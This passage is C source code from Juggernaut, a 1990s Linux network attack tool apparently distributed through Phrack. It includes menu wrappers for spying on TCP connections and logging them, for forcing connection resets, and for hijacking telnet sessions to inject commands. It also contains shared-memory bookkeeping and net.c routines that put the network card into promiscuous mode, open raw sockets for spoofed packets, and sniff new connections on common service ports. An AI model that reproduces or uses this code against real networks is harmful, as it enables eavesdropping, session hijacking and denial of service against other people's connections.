| while(1){ |
| fprintf(stderr,"\nChoose a connection [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q')return; |
| if(!(int)(val=atoi(buf)))continue; |
| if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); |
| else break; |
| } |
| fprintf(stderr,"\nDo you wish to log to a file as well? [y/N] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(toupper(buf[0])=='Y'){ |
| if(!(fp=fopen(LOGFILE,"a+"))){ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open file for logging, skipping operation.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| } |
| } |
| fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when done.\n"); |
| signal(SIGINT,convulsion); |
| sigsentry=1; |
| cspy(target,fp); |
| if(fp)fclose(fp); |
| } |
|
|
|
|
| /* |
| * crst wrapper |
| */ |
|
|
| void rst(){ |
|
|
| void convulsion(); |
| float dump(); |
| void crst(struct connectionInfo *); |
|
|
| struct connectionInfo *checkc(int); |
|
|
| char buf[MINIBUF]; |
| unsigned short val; |
| struct connectionInfo *target; |
|
|
| dump(); |
| |
| while(1){ |
| fprintf(stderr,"\nChoose a connection [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q')return; |
| if(!(int)(val=atoi(buf)))continue; |
| if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); |
| else break; |
| } |
| signal(SIGINT,convulsion); |
| crst(target); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
|
|
|
|
| /* |
| * acrst wrapper |
| */ |
|
|
| void arst(){ |
|
|
| void convulsion(); |
| float dump(); |
| void acrst(unsigned long,unsigned long); |
| char *hostLookup(unsigned long); |
| unsigned long nameResolve(char *); |
|
|
| char buf[4*MINIBUF]; |
| unsigned long source,target; |
| /* Setup addresing info */ |
| fprintf(stderr,"\nEnter source IP [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q')return; |
| if(!(source=nameResolve(buf))){ |
| if(verbosity){ |
| fprintf(stderr,"Name lookup failure: `%s`\n[cr]",buf); |
| getchar(); |
| } |
| return; |
| } |
| fprintf(stderr,"\nEnter target IP (optional) [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q')return; |
| if(buf[0]==0x0a)target=0; /* target may be null, in this |
| case, we only care where |
| the connection is coming from */ |
| else if(!(target=nameResolve(buf))){ |
| if(verbosity){ |
| fprintf(stderr,"Name lookup failure: %s\n[cr]",buf); |
| getchar(); |
| } |
| return; |
| } |
| if(!target)fprintf(stderr,"Reseting all connection requests from:\t %s\n",hostLookup(source)); |
| else fprintf(stderr,"Reseting all connection requests from:\t %s --> %s\n",hostLookup(source),hostLookup(target)); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| acrst(source,target); |
| } |
|
|
|
|
| /* |
| * dumpc wrapper |
| */ |
|
|
| float dump(){ |
|
|
| float dumpc(); |
| float usage=0; |
|
|
| fprintf(stderr,"\nCurrent Connection Database:\n"); |
| fprintf(stderr,"-------------------------------------------------\n"); |
| fprintf(stderr,"ref # source target \n\n"); |
| usage=dumpc(); |
| fprintf(stderr,"-------------------------------------------------\n"); |
|
|
| return usage; |
| } |
|
|
|
|
| /* |
| * database manipulation routines go here.. |
| */ |
|
|
| void dbmanip(){ |
|
|
| float dump(); |
| void cleardb(); |
|
|
| float usage=0; |
| char buf[MINIBUF]; |
|
|
| usage=dump(); |
|
|
| if(usage)fprintf(stderr,"\nDatabase is %.02f%% to capacity.",usage); |
| else fprintf(stderr,"\nDatabase is empty."); |
|
|
| fprintf(stderr,"\n[c,q] >"); |
| fgets(buf,sizeof(buf),stdin); |
|
|
| if(buf[0]=='c'){ |
| fprintf(stderr,"\nClear entire connection database? [y/N] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='y'){ |
| cleardb(); |
| fprintf(stderr,"\nConnection database cleared.\n[cr]"); |
| getchar(); |
| } |
| } |
| } |
|
|
| /* |
| * Juggernaut version and option information |
| */ |
|
|
| void jinfo(){ |
|
|
| time_t current=0; |
|
|
| fprintf(stderr,"Juggernaut %s route@infonexus.com [guild 1996/7]\n",version); |
|
|
| fprintf(stderr,"\nJuggernaut compiled with the following options:\n"); |
| #ifdef MULTI_P |
| fprintf(stderr," Multi-processing\n"); |
| #endif |
|
|
| #ifdef NOHUSH |
| fprintf(stderr," Audible notification\n"); |
| #endif |
|
|
| #ifdef USENAME |
| fprintf(stderr," Use hostnames\n"); |
| #endif |
|
|
| #ifdef GREED |
| fprintf(stderr," Greedy connections\n"); |
| #endif |
|
|
| #ifdef FASTCHECK |
| fprintf(stderr," Fast IP checksuming\n"); |
| #endif |
|
|
| #ifdef IP_HDRINCL |
| fprintf(stderr," IP header include\n"); |
| #endif |
|
|
| #ifdef THREAD |
| fprintf(stderr," Multi-threading\n"); |
| #endif |
|
|
| time(¤t); |
| fprintf(stderr,"Juggernaut has been running %.02f minutes\n",(difftime(current,uptime)/60)); |
|
|
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
|
|
| /* |
| * csimplexhijack wrapper |
| */ |
|
|
| void simplexhijack(){ |
|
|
|
|
| void sputter(); |
| float dump(); |
| void csimplexhijack(struct connectionInfo *,char *); |
| void cspy(struct connectionInfo *,FILE *); |
| struct connectionInfo *checkc(int); |
| |
| char buf[MINIBUF]; |
| char commandbuf[BUFSIZE]; |
| unsigned short val; |
| struct connectionInfo *target; |
|
|
| dump(); |
| |
| while(1){ |
| fprintf(stderr,"\nChoose a connection [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q')return; |
| if(!(int)(val=atoi(buf)))continue; |
| if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); |
| else break; |
| } |
| if(ntohs(target->dport)!=23){ |
| fprintf(stderr,"Hijacking only valid with telnet connections.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| return; |
| } |
| fprintf(stderr,"Enter the command string you wish executed [q] >"); |
| fgets(commandbuf,sizeof(commandbuf),stdin); |
| if(commandbuf[0]==0x0a)return; |
| fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n"); |
| fprintf(stderr,"\nNOTE: This may cause an ACK storm until client is RST.\n"); |
| signal(SIGINT,sputter); |
| sigsentry=1; |
| cspy(target,0); |
| csimplexhijack(target,commandbuf); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
|
|
|
|
| /* |
| * chijack wrapper |
| */ |
|
|
| void hijack(){ |
|
|
| void sputter(); |
| float dump(); |
| void chijack(struct connectionInfo *); |
| void cspy(struct connectionInfo *,FILE *); |
| struct connectionInfo *checkc(int); |
| |
| char buf[MINIBUF]; |
| unsigned short val; |
| struct connectionInfo *target; |
|
|
| dump(); |
| |
| while(1){ |
| fprintf(stderr,"\nChoose a connection [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q')return; |
| if(!(int)(val=atoi(buf)))continue; |
| if(!(target=checkc(val)))fprintf(stderr,"Connection not in queue.\n"); |
| else break; |
| } |
| if(ntohs(target->dport)!=23){ |
| fprintf(stderr,"Hijacking only valid with telnet connections.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| return; |
| } |
| fprintf(stderr,"\nSpying on connection, hit `ctrl-c` when you want to hijack.\n"); |
| fprintf(stderr,"\nNOTE: This will cause an ACK storm and desynch the client until the connection is RST.\n"); |
| signal(SIGINT,sputter); |
| sigsentry=1; |
| cspy(target,0); |
| sigsentry=1; |
| chijack(target); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
|
|
|
|
| /* |
| * Prometheus wrapper (packet assembly workshop) |
| */ |
|
|
| void pkta(){ |
|
|
| void mpkta(); |
| void mwipe(); |
| int prometheus(int); |
| |
| int val,mode; |
| char buf[MINIBUF]; |
| |
| while(1){ |
| mwipe(); |
| mpkta(); |
| fgets(buf,sizeof(buf),stdin); |
| if(!(val=atoi(buf)))continue; |
| switch(val){ |
| case 1: /* TCP */ |
| mode=1; |
| break; |
| case 2: /* UDP */ |
| mode=2; |
| break; |
| case 3: /* ICMP */ |
| mode=3; |
| break; |
| case 4: /* IP */ |
| mode=4; |
| break; |
| case 5: /* Return */ |
| return; |
| default: |
| continue; |
| } |
| if(prometheus(mode))break; |
| } |
| /* NOT REACHED */ |
| } |
|
|
| <--> |
| <++> Juggernaut/NumberOneCrush/mem.c |
| /* |
| * |
| * Juggernaut |
| * Version b1 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * mem.c - contains shared memory and semaphore control logic |
| * |
| * Multi-process: |
| * Initializing and accesing shared memory: |
| * ---------------------------------------- |
| * - Create the shared segment |
| * - Attach each process to the segment (in our case, the hunter child |
| * process will inherit a pointer to the block) |
| * - Grab a semaphore |
| * - Lock the semaphore; Manipulate shared segment; unlock the semaphore |
| * |
| * |
| * Multi-threaded: |
| */ |
|
|
|
|
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <string.h> |
| #include <arpa/inet.h> |
| #include <linux/if_ether.h> |
| #include <linux/ip.h> |
| #include <linux/tcp.h> |
| #include <sys/types.h> |
| #include <sys/ipc.h> |
| #include <sys/sem.h> |
| #include <sys/shm.h> |
|
|
| #define SHMKEY 242 /* Shared memory key */ |
| #define SEMKEY 424 /* Semaphore key */ |
| #define PERMS 0666 /* Shared Memory Permissions */ |
| #define MAXNODES 512 /* Maximum number of nodes */ |
| #define ADDMSG "+" |
| #define DELMSG "-" |
|
|
| int semid; /* Semaphore ID */ |
|
|
| struct sembuf lock[2]={{0,0,0},{0,1,SEM_UNDO}}; |
| /* wait for sem#0 to become 0 then |
| increment sem#0 by 1 */ |
| struct sembuf ulock[1]={{0,-1,(IPC_NOWAIT|SEM_UNDO)}}; |
| /* decrement sem#0 by 1 (sets it to 0) */ |
|
|
| struct epack{ /* Generic Ethernet packet w/o data payload */ |
| struct ethhdr eth; /* Ethernet Header */ |
| struct iphdr ip; /* IP header */ |
| struct tcphdr tcp; /* TCP header */ |
| char payload[8192]; /* Data Payload */ |
| }epack; |
|
|
| static struct connectionInfo{ /* Simple tuple structure */ |
| unsigned long saddr; /* Source IP */ |
| unsigned long daddr; /* Destination IP */ |
| unsigned short sport; /* Source TCP Port */ |
| unsigned short dport; /* Destination TCP Port */ |
| }*cinfo=0; |
|
|
| extern int verbosity; |
|
|
| /* |
| * Creates the shared memory segment then attaches it; then creates a binary |
| * semaphore to guarantee exclusive access. Clears the structure array. |
| * Dumps some info. |
| * Much credit to Richard Stevens and Jeff Thompson. |
| */ |
|
|
| void powerup(){ |
| |
| void locks(); |
| void ulocks(); |
| void cleardb(); |
|
|
| int shmid; /* Shared memory segment id */ |
| int len; |
| |
| len=sizeof(struct connectionInfo)*MAXNODES; |
|
|
| /* Request a shared memory segment */ |
| if((shmid=shmget(SHMKEY,len,IPC_CREAT))<0){ |
| if(verbosity)perror("(powerup) shared memory segment allocation error [fatal]"); |
| exit(1); |
| } |
| /* Get one semaphore to perform shared |
| memory locking with */ |
| if((semid=semget(SEMKEY,1,IPC_CREAT|PERMS))<0){ |
| if(verbosity)perror("(powerup) semaphore allocation error [fatal]"); |
| exit(1); |
| } |
| /* Attach to the shared memory segment */ |
| cinfo=(struct connectionInfo *)shmat(shmid,0,0); |
|
|
| cleardb(); |
| } |
|
|
| /* |
| * Release the shared memory segment. |
| */ |
|
|
| void powerdown(){ |
|
|
| void locks(); |
| void ulocks(); |
|
|
| locks(); |
| shmdt((char *)cinfo); /* Dettach the segment. */ |
| ulocks(); |
| } |
|
|
| /* |
| * Locks the semaphore so the caller can access the shared memory segment. |
| * This is an atomic operation. |
| */ |
|
|
| void locks(){ |
| if(semop(semid,&lock[0],2)<0){ |
| if(verbosity)perror("(locks) could not lock semaphore [fatal]"); |
| exit(1); |
| } |
| } |
| |
| /* |
| * Unlocks the semaphore so the caller can access the shared memory segment. |
| * This is an atomic operation. |
| */ |
|
|
| void ulocks(){ |
| if(semop(semid,&ulock[0],1)<0){ |
| if(verbosity)perror("(ulocks) could not unlock semaphore [fatal]"); |
| exit(1); |
| } |
| } |
|
|
|
|
| /* |
| * Add a connection to our list. Linear search of the WHOLE list to see if |
| * it's already there (which IT SHOULDN'T BE...), if not, add it in the |
| * first open slot. |
| */ |
|
|
| char *addc(iphp,tcphp) |
| struct iphdr *iphp; |
| struct tcphdr *tcphp; |
| { |
| void locks(); |
| void ulocks(); |
| |
| int i=0; |
| /* A wonderfully inefficient linear |
| search for duplicates */ |
|
|
| locks(); /* Lock shared memory segment */ |
| for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){ |
| ulocks(); |
| return(0); /* Opps. Found a duplicate */ |
| } |
| /* Find available slot */ |
| for(i=0;i<MAXNODES;i++){ |
| if(cinfo[i].saddr)continue; |
| else{ |
| cinfo[i].saddr=iphp->saddr; |
| cinfo[i].daddr=iphp->daddr; |
| cinfo[i].sport=tcphp->source; |
| cinfo[i].dport=tcphp->dest; |
| ulocks(); |
| return(ADDMSG); |
| } |
| } /* Control falls here if array is |
| full (which is indicative of |
| a BUSY NETWORK!@*/ |
| ulocks(); |
| return(0); |
| } |
|
|
|
|
| /* |
| * Remove a connection from our list. Linear search until we find a |
| * correspoding entry, or we hit the end of the list. |
| */ |
|
|
| char *delc(iphp,tcphp) |
| struct iphdr *iphp; |
| struct tcphdr *tcphp; |
| { |
| |
| void locks(); |
| void ulocks(); |
|
|
| int i=0; |
|
|
| locks(); /* Lock shared memory segment */ |
| for(;i<MAXNODES;i++)if(iphp->saddr==cinfo[i].saddr&&iphp->daddr==cinfo[i].daddr&&tcphp->source==cinfo[i].sport&&tcphp->dest==cinfo[i].dport){ |
| bzero(&cinfo[i],sizeof(cinfo[i])); |
| ulocks(); |
| return(DELMSG); /* Inform caller of success */ |
| } |
| ulocks(); |
| return(0); /* hmm. Wierd. */ |
| } |
|
|
|
|
| /* |
| * Dump the connection list. |
| */ |
|
|
| float dumpc() |
| { |
| void locks(); |
| void ulocks(); |
| char *hostLookup(unsigned long); |
|
|
| int i=0; |
| float j=0; |
|
|
| locks(); |
| for(;i<MAXNODES;i++)if(cinfo[i].saddr){ |
| fprintf(stderr,"(%d)\t %s [%d]\t-->\t %s [%d]\n",i+1,hostLookup(cinfo[i].saddr),ntohs(cinfo[i].sport),hostLookup(cinfo[i].daddr),ntohs(cinfo[i].dport)); |
| j++; |
| } |
| ulocks(); |
| if(!j)return(0); |
| return(((j/MAXNODES)*100)); /* % utilization */ |
| } |
|
|
|
|
| /* |
| * Check for a connection by index number. Really only here to make sure the |
| * connection hasn't been deleted since dump() was called.... I think I |
| * will deprecate this function in future versions... |
| */ |
| |
| struct connectionInfo *checkc(target) |
| int target; |
| { |
| void locks(); |
| void ulocks(); |
|
|
| static struct connectionInfo tmp; |
| |
| locks(); /* Lock shared memory segment */ |
| if(cinfo[--target].saddr){ |
| memcpy(&tmp,&cinfo[target],sizeof(tmp)); |
| ulocks(); |
| return(&tmp); |
| } |
| ulocks(); /* Nope. Not there */ |
| return((struct connectionInfo *)0); |
| } |
|
|
|
|
| /* |
| * Clear the connection database |
| */ |
|
|
| void cleardb(){ |
|
|
| void locks(); |
| void ulocks(); |
|
|
| int i=0; |
|
|
| locks(); |
| for(;i<MAXNODES;i++)bzero(&cinfo[i],sizeof(cinfo[i])); |
| ulocks(); |
| } |
| <--> |
| <++> Juggernaut/NumberOneCrush/menu.c |
| /* |
| * |
| * Juggernaut |
| * Version b2 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * menu.c - menu functions. |
| * |
| */ |
|
|
| #include <stdio.h> |
|
|
| extern char version[]; |
|
|
| /* |
| * Initial Screen |
| */ |
|
|
| void minit(){ |
| |
| printf("\t\t\t J U G G E R N A U T\n"); |
| printf("\t\t multipurpose network tool for Linux\n"); |
| printf("\t\t\t version: %s\n",version); |
| printf("\n\n\n\n\n\n"); |
| printf("\t (c) 1996/7 daemon9 | A Guild Corporation Production\t\t\t\n"); |
| printf("\n\n\n\n\n\n"); |
| } |
|
|
| /* |
| * Main Menu |
| */ |
|
|
| void mmain(){ |
|
|
| printf("\t\t\t Juggernaut\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| printf("\t\t\t?) Help\n"); |
| printf("\t\t\t0) Program information\n"); |
| printf("\t\t\t1) Connection database\n"); |
| printf("\t\t\t2) Spy on a connection\n"); |
| printf("\t\t\t3) Reset a connection\n"); |
| printf("\t\t\t4) Automated connection reset daemon\n"); |
| printf("\t\t\t5) Simplex connection hijack\n"); |
| printf("\t\t\t6) Interactive connection hijack\n"); |
| printf("\t\t\t7) Packet assembly module\n"); |
| printf("\t\t\t8) Souper sekret option number eight\n"); |
| printf("\t\t\t9) Step Down\n"); |
| printf("\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * Packet Assembly Menu [prometheus module] |
| */ |
|
|
| void mpkta(){ |
|
|
| printf("\t\t\t Packet Assembly Module (beta)\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| printf("\t\t\t1. TCP Assembler\n"); |
| printf("\t\t\t2. UDP Assembler\n"); |
| printf("\t\t\t3. ICMP Assembler\n"); |
| printf("\t\t\t4. IP Assembler\n"); |
| printf("\t\t\t5. Return to previous menu\n"); |
| printf("\n\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * TCP assembly options menu |
| */ |
|
|
| void mpktatcp(packetready,source,destination,seqnum,acknum,control,window,data) |
| int packetready; |
| unsigned short source; |
| unsigned short destination; |
| unsigned long seqnum; |
| unsigned long acknum; |
| char *control; |
| unsigned short window; |
| char data[512]; |
| { |
|
|
| printf("\t\t\t TCP Packet Assembly\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| if(!(packetready&0x01))printf("\t\t\t1. Source port\n"); |
| else printf("\t\t\tSource port: %d\n",source); |
| if(!(packetready&0x02))printf("\t\t\t2. Destination port\n"); |
| else printf("\t\t\tDestination port: %d\n",destination); |
| if(!(packetready&0x04))printf("\t\t\t3. Sequence Number\n"); |
| else printf("\t\t\tSequence Number: %ld\n",seqnum); |
| if(!(packetready&0x08))printf("\t\t\t4. Acknowledgement Number\n"); |
| else printf("\t\t\tAcknowledgement Number: %ld\n",acknum); |
| if(!(packetready&0x10))printf("\t\t\t5. Control Bits\n"); |
| else printf("\t\t\tControl Flags: %s\n",control); |
| if(!(packetready&0x20))printf("\t\t\t6. Window Size\n"); |
| else printf("\t\t\tWindow Size: %d\n",window); |
| if(!(packetready&0x40))printf("\t\t\t7. Data Payload\n"); |
| else printf("\t\t\tData payload: %s\n",data); |
| printf("\t\t\t8. Return to previous menu\n"); |
| printf("\t\t\t9. Return to main menu\n"); |
| if(packetready==0x7F)printf("\t\t\t10. Pass packet to RIP assembler\n"); |
| printf("\n\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * UDP assembly options menu |
| */ |
|
|
| void mpktaudp(packetready,source,destination,data) |
| int packetready; |
| unsigned short source; |
| unsigned short destination; |
| char data[512]; |
| { |
| printf("\t\t\t UDP Packet Assembly\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| if(!(packetready&0x01))printf("\t\t\t1. Source port\n"); |
| else printf("\t\t\tSource port: %d\n",source); |
| if(!(packetready&0x02))printf("\t\t\t2. Destination port\n"); |
| else printf("\t\t\tDestination port: %d\n",destination); |
| if(!(packetready&0x04))printf("\t\t\t3. Data payload\n"); |
| else printf("\t\t\tData payload: %s\n",data); |
| printf("\t\t\t4. Return to previous menu\n"); |
| printf("\t\t\t5. Return to main menu\n"); |
| if(packetready==0x7)printf("\t\t\t6. Pass packet to RIP assembler\n"); |
| printf("\n\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * ICMP assembly options menu |
| */ |
|
|
| void mpktaicmp(packetready,type,code,data) |
| int packetready; |
| unsigned short type; |
| unsigned short code; |
| char data[512]; |
| { |
|
|
| printf("\t\t\t ICMP Packet Assembly\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| if(!(packetready&0x01))printf("\t\t\t1. Type\n"); |
| else printf("\t\t\tType: %d\n",type); |
| if(!(packetready&0x02))printf("\t\t\t2. Code\n"); |
| else printf("\t\t\tCode: %d\n",code); |
| if(!(packetready&0x04))printf("\t\t\t3. Data payload\n"); |
| else printf("\t\t\tData payload: %s\n",data); |
| printf("\t\t\t4. Return to previous menu\n"); |
| printf("\t\t\t5. Return to main menu\n"); |
| if(packetready==0x07)printf("\t\t\t6. Pass packet to RIP assembler\n"); |
| printf("\n\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * IP assembly options menu |
| */ |
|
|
| void mpktaip(packetready,tos,fflags,fo,ttl,saddr,daddr,number,packettype) |
| int packetready; |
| char *tos; |
| char *fflags; |
| unsigned short fo; |
| unsigned short ttl; |
| char *saddr; |
| char *daddr; |
| int number; |
| char *packettype; |
| { |
|
|
| printf("\t\t\t IP Packet Assembly\n"); |
| printf("\t\t\t+------------------------------+\n"); |
| if(!(packetready&0x01))printf("\t\t\t1. TOS\n"); |
| else printf("\t\t\tTOS: %s\n",tos); |
| if(!(packetready&0x02))printf("\t\t\t2. Fragment Flags\n"); |
| else printf("\t\t\tFragment flags: %s\n",fflags); |
| if(!(packetready&0x04))printf("\t\t\t3. Fragment Offset\n"); |
| else printf("\t\t\tFragment offset: %d\n",(fo&0x1fff)); |
| if(!(packetready&0x08))printf("\t\t\t4. TTL\n"); |
| else printf("\t\t\tTTL: %d\n",ttl); |
| if(!(packetready&0x10))printf("\t\t\t5. Source Address\n"); |
| else printf("\t\t\tSource Address: %s\n",saddr); |
| if(!(packetready&0x20))printf("\t\t\t6. Destination Address\n"); |
| else printf("\t\t\tDestination Address: %s\n",daddr); |
| if(!(packetready&0x40))printf("\t\t\t7. Number of packets to send\n"); |
| else printf("\t\t\tSending %d packet(s)\n",number); |
| printf("\t\t\t8. Return to previous menu\n"); |
| printf("\t\t\t9. Return to main menu\n"); |
| if(packetready==0x7f)printf("\t\t\t10. Transmit %s packet(s)\n",packettype); |
| printf("\n\n\n\n\n\n\n\n\n\n"); |
| printf(">"); |
| } |
|
|
| /* |
| * Clear the Screen |
| */ |
|
|
| void mwipe(){ |
|
|
| printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); |
| } |
| <--> |
| <++> Juggernaut/NumberOneCrush/net.c |
| /* |
| * |
| * Juggernaut |
| * Version b1 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * net.c - network/socket control code and abstract data types |
| * |
| * In the interest of time overhead vs. code size, I created several functions |
| * that do much the same thing. You will notice the reset and jack code is |
| * quite redundant. Life is rough like that. Deal with it. Also, there are |
| * problems with freeing malloc'd memory. |
| * |
| */ |
|
|
|
|
| #include <stdio.h> |
| #include <stdlib.h> |
| #include <time.h> |
| #include <ctype.h> |
| #include <netinet/in.h> |
| #include <arpa/inet.h> |
| #include <netdb.h> |
| #include <errno.h> |
| #include <arpa/inet.h> |
| #include <signal.h> |
| #include <string.h> |
| #include <setjmp.h> |
| #include <unistd.h> |
| #include <linux/socket.h> |
| #include <linux/ip.h> |
| #include <linux/tcp.h> |
| #include <linux/if_ether.h> |
| #include <linux/if_arp.h> |
| #include <linux/if.h> |
| #include <linux/sockios.h> |
| #include <sys/time.h> |
| #include <sys/resource.h> |
| #include <sys/ioctl.h> |
|
|
| #define DEVICE "eth0" |
| #define ETHHDR 14 |
| #define PHDR 12 |
| #define TCPHDR 20 |
| #define IPHDR 20 |
| #define BUFSIZE 512 |
| #define MINIBUF 10 |
| #define RSTS 10 /* Number of RSTs to send when RSTing a connection */ |
| #define JCKRST 3 /* You may wish to experiment with this value. The |
| smaller it is, your command have less time to |
| complete on the target. However, the ACK storm |
| will also be much shorter... */ |
| #define SNIFLOG "./juggernaut.log.snif" |
| |
| struct iphdr *iphp; /* Pointer into current packets IP header */ |
| struct tcphdr *tcphp; /* Pointer into current packets TCP header */ |
| struct ethhdr *ethhp; /* Pointer into current packets ethernet header */ |
|
|
| /* Macro to align the pointers into the ethernet, |
| IP, and TCP headers. */ |
| #define ALIGNNETPOINTERS(){\ |
| ethhp=(struct ethhdr *)(((unsigned long)&epack.eth));\ |
| iphp=(struct iphdr *)(((unsigned long)&epack.ip)-2);\ |
| tcphp=(struct tcphdr *)(((unsigned long)&epack.tcp)-2);\ |
| } |
|
|
| struct epack{ /* Generic Ethernet packet w/o data payload */ |
| struct ethhdr eth; /* Ethernet Header */ |
| struct iphdr ip; /* IP header */ |
| struct tcphdr tcp; /* TCP header */ |
| char payload[8192]; /* Data Payload */ |
| }epack; |
|
|
| struct connectionInfo{ |
| unsigned long saddr; /* Source IP */ |
| unsigned long daddr; /* Destination IP */ |
| unsigned short sport; /* Source TCP Port */ |
| unsigned short dport; /* Destination TCP Port */ |
| }; |
|
|
| jmp_buf env; /* To preserve our environment */ |
| extern int verbosity; /* Should we dump error messages? */ |
|
|
| /* |
| * Creates a low level raw-packet socket and puts the device into promiscuous |
| * mode. |
| */ |
|
|
| int tap(device) |
| char *device; |
| { |
| |
| int fd; |
| struct ifreq ifr; /* Link-layer interface request structure */ |
| /* Ethernet code for IP 0x800==ETH_P_IP */ |
| if((fd=socket(AF_INET,SOCK_PACKET,htons(ETH_P_IP)))<0){ |
| if(verbosity)perror("(tap) SOCK_PACKET allocation problems [fatal]"); |
| exit(1); |
| } |
| strcpy(ifr.ifr_name,device); |
| if((ioctl(fd,SIOCGIFFLAGS,&ifr))<0){ /* Get the device info */ |
| if(verbosity)perror("(tap) Can't get device flags [fatal]"); |
| close(fd); |
| exit(1); |
| } |
| ifr.ifr_flags|=IFF_PROMISC; /* Set promiscuous mode */ |
| if((ioctl(fd,SIOCSIFFLAGS,&ifr))<0){ /* Set flags */ |
| if(verbosity)perror("(tap) Can't set promiscuous mode [fatal]"); |
| close(fd); |
| exit(1); |
| } |
| return(fd); |
| } |
|
|
|
|
| /* |
| * Gimme a raw-IP socket. Use of IP_HDRINCL is automatic with 2.0.x |
| * kernels. Not sure about 1.2.x |
| */ |
|
|
| int rawsock(){ |
|
|
| int fd,val=1; |
| |
| if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0){ |
| if(verbosity)perror("\n(rawsock) Socket problems [fatal]"); |
| exit(1); |
| } |
|
|
| #ifdef IP_HDRINCL |
| if(setsockopt(fd,IPPROTO_IP,IP_HDRINCL,&val,sizeof(val))<0){ |
| if(verbosity){ |
| perror("Cannot set IP_HDRINCL socket option"); |
| fprintf(stderr,"\nIf you are relying on this rather then a hacked kernel to spoof packets, your sunk.\n[cr]"); |
| getchar(); |
| } |
| } |
| #endif |
|
|
| return(fd); |
| } |
|
|
|
|
| /* |
| * Hunter. At this point, only cares about connection information (infant |
| * connections and tear-downs). I should have it pass SEQ and ACK related |
| * info to the relevant functions... This function will be forked to the |
| * backround as a seperate process, and in future versions it will be |
| * implemented as a seperate thread of execution. |
| */ |
| |
| void chunt(){ |
|
|
| void add(struct iphdr *,struct tcphdr *,struct ethhdr *); |
| void del(struct iphdr *,struct tcphdr *); |
|
|
| extern int linksock; /* raw packet socket */ |
| |
| ALIGNNETPOINTERS(); |
| /* No alarm timeout here. We block forever until packets zing by */ |
| while(1)if(recv(linksock,&epack,sizeof(epack),0)){ |
| if(iphp->protocol==IPPROTO_TCP&&(tcphp->syn&&!tcphp->ack))add(iphp,tcphp,ethhp); |
| if(iphp->protocol==IPPROTO_TCP&&(tcphp->rst||tcphp->fin))del(iphp,tcphp); |
| } |
| } |
|
|
| /* |
| * addc() wrapper. Checks to make sure we want to add this connection to |
| * our list.... At this point, we'll take ftp control, ssh (well, we can |
| * RST them) telnet, smtp, http, rlogin, and irc. |
| */ |
|
|
| void add(iphp,tcphp,ethhp) |
| struct iphdr *iphp; |
| struct tcphdr *tcphp; |
| struct ethhdr *ethhp; /* Future Use */ |
| { |
| char *addc(struct iphdr *, struct tcphdr *); |
|
|
| char *msg; |
|
|
| #ifdef GREED |
| if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); |
| #ifdef NOHUSH |
| fprintf(stderr,"%c",7); |
| #endif |
| return; |
| #else |
| switch(ntohs(tcphp->dest)){ |
| case 21: |
| case 22: |
| case 23: |
| case 25: |
| case 80: |
| case 513: |
| case 6667: |
| if(((int)msg=addc(iphp,tcphp)))if(verbosity)fprintf(stderr,"%c%s",0x08,msg); |
| #ifdef NOHUSH |
| fprintf(stderr,"%c",7); |
| #endif |
| return; |
| default: |
| return; |
| } |
| #endif |
| } |
|
|
|
|
| /* |
| * delc() wrapper. Checks connection port number to see if we should even |
| * bother passing to the delete function which will do a potentially expensive |
| * linear search... |
| */ |
|
|
| void del(iphp,tcphp) |
| struct iphdr *iphp; |
| struct tcphdr *tcphp; |
| { |
| char *delc(struct iphdr *, struct tcphdr *); |
|
|
| char *msg; |
|
|
| #ifdef GREED |
